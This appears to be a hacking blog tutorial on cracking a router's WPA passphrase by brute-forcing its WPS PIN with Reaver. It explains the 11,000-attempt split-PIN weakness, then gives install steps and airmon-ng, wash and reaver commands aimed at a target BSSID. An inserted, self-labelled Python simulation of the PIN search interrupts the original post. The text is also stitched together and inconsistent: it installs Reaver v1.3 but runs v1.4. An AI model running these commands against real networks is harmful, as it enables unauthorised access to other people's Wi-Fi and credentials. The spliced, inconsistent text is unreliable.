Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar.
In order to authenticate as a registrar, the registrar must prove its knowledge of the AP's 8-digit WPS PIN. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.
Reaver performs a brute force attack against the AP, trying PINs until it hits the AP's 8-digit PIN. Since the PIN is all numeric, there are 10^8 (100,000,000) possible values. However, because the last digit is a checksum computed from the previous 7 digits, the key space is reduced to 10^7 (10,000,000) possible values. What makes the attack practical is that the protocol checks the PIN in two halves: the AP's response to message M4 reveals whether the first 4 digits were correct, and its response to M6 whether the remaining 3 digits (plus checksum) were, so an attacker needs at most 10^4 + 10^3 = 11,000 attempts rather than 10^7.
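The checksum rule and the split key space described above, as an added worked example (this is not code from the original post or from Reaver). The checksum digit follows the WPS rule; the SimulatedAP class is an assumption constructed for the example: it stands in for the real M4/M6 exchange by answering a yes/no question for each PIN half, which is all the attacker learns from the real protocol.

```python
"""WPS PIN checksum and the split-PIN search space (added example).

Shows (1) the checksum rule that shrinks the key space from 10^8 to 10^7
and (2) why checking the PIN half by half cuts the search to at most
10^4 + 10^3 attempts. The SimulatedAP oracle is constructed for this
example and is not a WPS implementation.
"""
from typing import Tuple


def wps_checksum(first_seven: int) -> int:
    """Checksum digit for a 7-digit WPS PIN prefix.

    Digits are weighted 3,1,3,1,3,1,3 from the leftmost digit; the
    checksum digit makes the weighted sum a multiple of 10.
    """
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("expected a value with at most 7 digits")
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)   # rightmost remaining digit weighs 3
        pin //= 10
        accum += pin % 10         # next digit weighs 1
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits whose last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum(int(pin[:7]))


def make_pin(first_half: int, second_half: int) -> str:
    """Assemble an 8-digit PIN from a 4-digit and a 3-digit half plus checksum."""
    prefix = first_half * 1000 + second_half
    return f"{prefix:07d}{wps_checksum(prefix)}"


FIRST_HALF_SPACE = 10 ** 4     # digits 1-4, no checksum
SECOND_HALF_SPACE = 10 ** 3    # digits 5-7; digit 8 is derived
MAX_ATTEMPTS = FIRST_HALF_SPACE + SECOND_HALF_SPACE   # 11,000


class SimulatedAP:
    """Stand-in for the AP side of the exchange (constructed for this example).

    A real AP reveals at message M4 whether the first half was right and at
    M6 whether the second half was; here each check is just a yes/no oracle
    that also counts how many attempts the attacker has made.
    """

    def __init__(self, secret_pin: str) -> None:
        if not is_valid_pin(secret_pin):
            raise ValueError("AP PIN must carry a valid checksum")
        self._first = secret_pin[:4]
        self._second = secret_pin[4:]   # 3 digits plus checksum digit
        self.attempts = 0

    def try_first_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self._first

    def try_second_half(self, first: str, half: str) -> bool:
        self.attempts += 1
        return first == self._first and half == self._second


def recover_pin(ap: SimulatedAP) -> Tuple[str, int]:
    """Recover the PIN half by half; returns (pin, attempts used)."""
    first = None
    for i in range(FIRST_HALF_SPACE):
        cand = f"{i:04d}"
        if ap.try_first_half(cand):
            first = cand
            break
    if first is None:
        raise RuntimeError("first half not found")
    # Only 10^3 second halves are worth trying: the checksum is derived,
    # so each candidate carries its own correct final digit.
    for j in range(SECOND_HALF_SPACE):
        cand = f"{j:03d}{wps_checksum(int(first) * 1000 + j)}"
        if ap.try_second_half(first, cand):
            return first + cand, ap.attempts
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    ap = SimulatedAP("12345670")   # constructed secret PIN
    pin, n = recover_pin(ap)
    print(f"recovered {pin} after {n} attempts (worst case {MAX_ATTEMPTS})")
```

The worst case is a PIN starting 9999 and continuing 999: exactly 11,000 oracle answers, against the 10,000,000 a naive search of the checksummed space would need.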
Downloaded and installed Reaver (as of this date 18-01-2012 reaver v1.3)
tar -xzf reaver-1.3.tar.gz
cd reaver-1.3/src
./configure
make && make install
Carried out a quick scan with wash to get the details of my (now committed to the shelf of shame..) router. Using a wireless adapter with the Realtek RTL8187L chipset and the rtl8187 driver in this case.
Started the wireless interface on the channel of my AP (Channel 11).
(I was having issues with aireplay-ng when I had not specified the channel that should be used.)
airmon-ng start wlan0 11
wash -i mon0 -C
COMMAND TO GET DETAILS OF WPS (Wi-Fi Protected Setup) NETWORK
Start Reaver v1.4 with the -A switch, so that Reaver does not associate with the router itself (with -A, association must be done by another tool such as aireplay-ng), in a separate terminal window.
reaver -i mon0 -A -b <bssid of target WPS network> -c <channel> -e <essid of target WPS network> -vv
Now wait while Reaver works through the PINs; when the AP accepts one, Reaver prints the WPS PIN together with the WPA PSK the AP handed over. Some APs rate-limit or lock WPS after repeated failed attempts; Reaver reports this and pauses before retrying, which is the main thing that slows the attack down.
PIN MATCHING PROCESS
The next part of the article will be coming soon.
Till then cheers, HAPPY HACKING